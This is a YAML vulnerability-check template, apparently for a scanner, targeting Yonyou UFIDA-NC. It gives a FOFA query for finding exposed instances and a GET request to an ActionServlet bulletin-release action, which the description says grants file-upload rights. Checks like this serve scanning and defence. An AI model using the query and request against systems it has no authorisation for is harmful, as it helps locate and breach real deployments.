product: 用友UFIDA-NC
vName: 用友UFIDA-NC - Information Exposure
type: 信息泄露
vID: [ ]
level: 2
vDesc: After logging in and visiting the address where the information was leaked, you will have permission to upload files. Then just go back to the homepage and view the published content directly.
version: ''
note: ''
search:
  FOFA: app="用友-UFIDA-NC" && icon_hash="1085941792"
protocol: http
link: https://mp.weixin.qq.com/s/Lu6Zd9LP3PQsb8uzTIcANQ
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /service/~iufo/com.ufida.web.action.ActionServlet?TableSelectedID&TreeSelectedID&action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease
    verify:
      logic: and
      check:
        - body:
            value:
              - iufo/web/images/usericon.gif
              - /iufo/web/images/tree/tree_plus.gif
            logic: and
        - status: 200